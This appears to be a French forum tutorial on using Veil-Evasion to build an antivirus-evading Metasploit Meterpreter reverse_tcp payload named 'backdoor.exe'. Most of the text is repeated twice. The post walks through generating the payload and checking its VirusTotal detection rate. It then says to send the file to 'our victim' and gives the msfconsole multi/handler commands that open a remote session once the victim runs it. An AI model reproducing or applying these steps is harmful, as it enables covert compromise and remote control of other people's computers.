Dernièrement j'avais envie de voir plus sur Metasploit et il s'avère que pas mal de scripts existent sur cette plateforme et permettent d'améliorer les (nombreux) outils déjà en place.
Sachez que vous devrez avoir prévu à la base de l'espace mémoire pour stocker les nouveautés.
J'ai découvert veil.py un encodeur de payload écrit en python sur un site qui permet de rendre les payloads de Metasploit(Meterpreter) peu détectables par les antivirii.
Ce n'est pas du 100% FUD.
Voici le lien : https://github.com/Veil-Framework/Veil-Evasion/
Pour ce test, je suis sur Kali-Linux (dernière version en date à ce jour) où tous les outils nécessaires pour ce test sont pré-installés.
Soit :
Linux
Kali (x86) où toutes les dépendances sont pré-installées.
Ou :
Installer :
Python 2.7
PyCrypto >= 2.3
Sinon :
Windows (par py2exe compilation)
Python (testé avec x86 - - http://www.python.org/download/releases/2.7/)
Py2Exe (http://sourceforge.net/projects/py2e.../py2exe/0.6.9/)
PyCrypto (http://www.voidspace.org.uk/python/modules.shtml)
PyWin32 (http://sourceforge.net/projects/pywi...7.exe/download)
Test :
Téléchargement de l'archive.
Le dézipper (moi j'ai configuré un dézzipeur, mais si ce n'est pas votre cas) :
Lancement de l'installation :
On se déplace dans le dossier cd Veil-Evasion-master/setup/ et de là on exécute le fichier setup.sh
Cette commande effectue les 3 en 1.
Si l'install ne démarre pas, vérifiez que le fichier a bien été téléchargé et qu'il est exécutable :
puis :
Patientez et mettez 'Yes' à chaque fois.
Le téléchargement des dépendances et de mises à jour est long mais sont nécessaires au bon fonctionnement du Framework.
Note : vous allez avoir vers la fin des "Problem: O:..." — ces erreurs n'ont aucune incidence sur la suite de l'installation et le fonctionnement de Veil : n'y prêtez donc pas attention et poursuivez l'install.
Lorsque vous arrivez à la config de Wine, validez 'Ok' à chaque fois.
Ensuite, lancez Veil :
tapez :
[>] Please enter a command: list
Puis sélectionner un payload (pour ce test nous allons prendre le 5eme : '5) c/meterpreter/rev_tcp'
[>] Please enter a command:5
Configurez le payload avec la commande suivante :
Mettez votre IP (si vous ne la connaissez pas ouvrez un terminal annexe et rentrez ifconfig)
[>] Please enter a command:generate
Là on nous demande de donner un nom à notre payload. Je mets tout simplement 'backdoor' comme nom.
Cliquez sur 'Enter' puis au main menu rentrez 'exit' afin de quitter proprement Veil.
[>] Please enter a command:exit
Allez dans votre dossier veil-output/compiled
Vous y trouverez donc votre backdoor.exe.
Vérifions si notre payload est perçu comme clean.
Analyse Virus Total :
15/54. C'est correct.
Reste plus qu'à envoyer notre backdoor.exe à notre victime et mettre un serveur en écoute à l'aide de metasploit.
Mettre un serveur en écoute :
> msfconsole
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set LHOST <ip>
Il s'agit de l'IP locale (faites à nouveau ifconfig si nécessaire)
> show options (pour vérifier que tout é bien été pris en compte)
> exploit
À partir de là, dès lors que votre victime exécutera backdoor.exe, meterpreter sera actif.
Meterpreter > [commande]
Envoyez vos commandes comme ceci, vous êtes à l'écoute !
Si cela vous a plu je vous partagerai d'autres techniques d'amélioration des outils de base de Kali.
Sachez que vous devrez avoir prévu à la base de l'espace mémoire pour stocker les nouveautés.
J'ai découvert veil.py un encodeur de payload écrit en python sur un site qui permet de rendre les payloads de Metasploit(Meterpreter) peu détectables par les antivirii.
Ce n'est pas du 100% FUD.
Voici le lien : https://github.com/Veil-Framework/Veil-Evasion/
Pour ce test, je suis sur Kali-Linux (dernière version en date à ce jour) où tous les outils nécessaires pour ce test sont pré-installés.
Soit :
Linux
Kali (x86) où toutes les dépendances sont pré-installées.
Ou :
Installer :
Python 2.7
PyCrypto >= 2.3
Sinon :
Windows (par py2exe compilation)
Python (testé avec x86 - - http://www.python.org/download/releases/2.7/)
Py2Exe (http://sourceforge.net/projects/py2e.../py2exe/0.6.9/)
PyCrypto (http://www.voidspace.org.uk/python/modules.shtml)
PyWin32 (http://sourceforge.net/projects/pywi...7.exe/download)
Test :
Téléchargement de l'archive.
Code:
wget https://github.com/veil-evasion/Veil/archive/master.zip
Le dézipper (moi j'ai configuré un dézzipeur, mais si ce n'est pas votre cas) :
Code:
unzip master.zip
Lancement de l'installation :
Code:
cd Veil-Evasion-master/setup/ && ./setup.sh
Cette commande effectue les 3 en 1.
Si l'install ne démarre pas, vérifiez que le fichier a bien été téléchargé et qu'il est exécutable :
Code:
cd Veil-Evasion-master/setup/
Code:
ls
Le téléchargement des dépendances et de mises à jour est long mais sont nécessaires au bon fonctionnement du Framework.
Note : vous allez avoir vers la fin des "Problem: O:..." — ces erreurs n'ont aucune incidence sur la suite de l'installation et le fonctionnement de Veil : n'y prêtez donc pas attention et poursuivez l'install.
Lorsque vous arrivez à la config de Wine, validez 'Ok' à chaque fois.
Ensuite, lancez Veil :
Code:
cd Veil-Evasion-master
Code:
python Veil-Evasion.py
tapez :
[>] Please enter a command: list
Puis sélectionner un payload (pour ce test nous allons prendre le 5eme : '5) c/meterpreter/rev_tcp'
[>] Please enter a command:5
Configurez le payload avec la commande suivante :
Code:
set LHOST <IP>
[>] Please enter a command:generate
Là on nous demande de donner un nom à notre payload. Je mets tout simplement 'backdoor' comme nom.
Cliquez sur 'Enter' puis au main menu rentrez 'exit' afin de quitter proprement Veil.
[>] Please enter a command:exit
Allez dans votre dossier veil-output/compiled
Vous y trouverez donc votre backdoor.exe.
Vérifions si notre payload est perçu comme clean.
Analyse Virus Total :
15/54. C'est correct.
Reste plus qu'à envoyer notre backdoor.exe à notre victime et mettre un serveur en écoute à l'aide de metasploit.
Mettre un serveur en écoute :
> msfconsole
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set LHOST <ip>
Il s'agit de l'IP locale (faites à nouveau ifconfig si nécessaire)
> show options (pour vérifier que tout é bien été pris en compte)
> exploit
À partir de là, dès lors que votre victime exécutera backdoor.exe, meterpreter sera actif.
Meterpreter > [commande]
Envoyez vos commandes comme ceci, vous êtes à l'écoute !
Si cela vous a plu je vous partagerai d'autres techniques d'amélioration des outils de base de Kali.
Commentaire